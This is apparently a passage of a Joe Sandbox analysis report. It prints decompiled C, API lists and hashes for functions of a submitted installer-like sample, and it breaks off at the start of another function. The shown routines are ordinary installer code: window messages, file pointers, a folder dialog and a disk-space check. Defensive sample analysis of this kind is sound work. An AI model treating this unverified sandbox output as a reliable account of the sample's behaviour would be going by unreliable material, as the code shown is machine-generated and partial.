                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044E5(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x433ed8;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044e5
                                                0x004044ec
                                                0x004044f7
                                                0x00000000
                                                0x004044f7
                                                0x004044fd

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044CE(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044dc
                                                0x004044e2

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034E5(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034f3
                                                0x004034f9

                                                APIs
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044BB(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x004044c5
                                                0x004044cb

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004014D7(intOrPtr __edx) {
                                                				long _t3;
                                                				void* _t7;
                                                				intOrPtr _t10;
                                                				void* _t13;
                                                
                                                				_t10 = __edx;
                                                				_t3 = E00402D84(_t7);
                                                				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                				if(_t3 <= 1) {
                                                					_t3 = 1;
                                                				}
                                                				Sleep(_t3); // executed
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                				return 0;
                                                			}







                                                0x004014d7
                                                0x004014d8
                                                0x004014e1
                                                0x004014e4
                                                0x004014e8
                                                0x004014e8
                                                0x004014ea
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                • Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E735412BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x7354506c +  *0x7354506c); // executed
                                                				return _t3;
                                                			}




                                                0x735412c5
                                                0x735412cb

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,735412DB,?,7354137F,00000019,735411CA,-000000A0), ref: 735412C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 09481e9ad46b06dc3a1a7ae11130bfae8a569fe9b78a8cb797ec03f6c17c87fd
                                                • Instruction ID: 2578afb9ecb3b06c1ae2ac40c6b7b0e4fb9df290c6f08975a70d4e62626e997b
                                                • Opcode Fuzzy Hash: 09481e9ad46b06dc3a1a7ae11130bfae8a569fe9b78a8cb797ec03f6c17c87fd
                                                • Instruction Fuzzy Hash: 98B012F6A40000DFEE08AB66CC06F343354F700301F144000FA0CC5180C3205C158534
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x42c240; // 0x71af4c
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + L"ppingA";
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E00405B81(0x3fb, _t146);
                                                					E004067C4(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B81(0x3fb, _t146);
                                                							if(E00405F14(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040653D(0x42b238, _t146);
                                                							_t87 = E0040690A(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E0040653D(0x42b238, _t146);
                                                								_t89 = E00405EB7(0x42b238);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x42b238) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E58(0x42b238);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x42b238) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404E27(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                									} else {
                                                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x434fa4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E004044BB(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                									E004048E3();
                                                								}
                                                								 *0x42d258 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x42d268;
                                                							_v60 = E00404CE0;
                                                							_v56 = _t146;
                                                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405E0C(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                										lstrcatW(_t146, 0x432ea0);
                                                									}
                                                								}
                                                								 *0x42d258 =  *0x42d258 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                						E00405E0C(_t146);
                                                					}
                                                					 *0x433ed8 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404499(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404499(_t167);
                                                					E004044CE(_t166);
                                                					_t138 = E0040690A(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00404500(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x0040498a
                                                0x00404990
                                                0x00404996
                                                0x004049a3
                                                0x004049b1
                                                0x004049b4
                                                0x004049bc
                                                0x004049c2
                                                0x004049c2
                                                0x004049ce
                                                0x004049d1
                                                0x00404a3f
                                                0x00404a46
                                                0x00404b1d
                                                0x00404b24
                                                0x00404b33
                                                0x00404b33
                                                0x00404b37
                                                0x00404b41
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b50
                                                0x00404b5e
                                                0x00404b65
                                                0x00404b6c
                                                0x00404b6f
                                                0x00404bab
                                                0x00404bad
                                                0x00404bb3
                                                0x00404bb8
                                                0x00404bbc
                                                0x00404bbe
                                                0x00404bbe
                                                0x00404bda
                                                0x00000000
                                                0x00404bdc
                                                0x00404bdf
                                                0x00404bed
                                                0x00404bf3
                                                0x00404bf4
                                                0x00404bf7
                                                0x00404bfa
                                                0x00000000
                                                0x00404bfa
                                                0x00404b71
                                                0x00404b73
                                                0x00404b77
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b79
                                                0x00404b79
                                                0x00404b86
                                                0x00404b8b
                                                0x00000000
                                                0x00000000
                                                0x00404b8f
                                                0x00404b91
                                                0x00404b91
                                                0x00404b9a
                                                0x00404b9c
                                                0x00404ba1
                                                0x00404ba4
                                                0x00404ba9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404ba9
                                                0x00404c06
                                                0x00404c10
                                                0x00404c13
                                                0x00404c16
                                                0x00404c1d
                                                0x00404c1d
                                                0x00404c1f
                                                0x00404c1f
                                                0x00404c24
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c35
                                                0x00404c37
                                                0x00404c42
                                                0x00404c42
                                                0x00404c37
                                                0x00404c52
                                                0x00404c5c
                                                0x00404c64
                                                0x00404c7f
                                                0x00404c66
                                                0x00404c6f
                                                0x00404c6f
                                                0x00404c64
                                                0x00404c84
                                                0x00404c89
                                                0x00404c8e
                                                0x00404c97
                                                0x00404c97
                                                0x00404ca0
                                                0x00404ca2
                                                0x00404ca2
                                                0x00404cae
                                                0x00404cb6
                                                0x00404cc0
                                                0x00404cc0
                                                0x00404cc5
                                                0x00000000
                                                0x00404cc5
                                                0x00404b6f
                                                0x00404b26
                                                0x00404b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b2d
                                                0x00404a4c
                                                0x00404a55
                                                0x00404a6f
                                                0x00404a74
                                                0x00404a7e
                                                0x00404a85
                                                0x00404a91
                                                0x00404a94
                                                0x00404a97
                                                0x00404a9e
                                                0x00404aa6
                                                0x00404aa9
                                                0x00404aad
                                                0x00404ab4
                                                0x00404abc
                                                0x00404b16
                                                0x00404abe
                                                0x00404abf
                                                0x00404ac6
                                                0x00404ad0
                                                0x00404ad8
                                                0x00404ae5
                                                0x00404af9
                                                0x00404afd
                                                0x00404afd
                                                0x00404af9
                                                0x00404b02
                                                0x00404b0f
                                                0x00404b0f
                                                0x00404abc
                                                0x00000000
                                                0x00404a74
                                                0x00404a62
                                                0x00000000
                                                0x00000000
                                                0x00404a68
                                                0x00000000
                                                0x004049d3
                                                0x004049e0
                                                0x004049e9
                                                0x004049f6
                                                0x004049f6
                                                0x004049fd
                                                0x00404a03
                                                0x00404a0c
                                                0x00404a0f
                                                0x00404a12
                                                0x00404a1a
                                                0x00404a1d
                                                0x00404a20
                                                0x00404a26
                                                0x00404a2d
                                                0x00404a34
                                                0x00404ccb
                                                0x00404cdd
                                                0x00404a3a
                                                0x00404a3d
                                                0x00000000
                                                0x00404a3d
                                                0x00404a34

                                                APIs
                                                • GetDlgItem.USER32 ref: 004049D9
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                • SetDlgItemTextW.USER32 ref: 00404B0F
                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call$ppingA
                                                • API String ID: 2624150263-846502358
                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
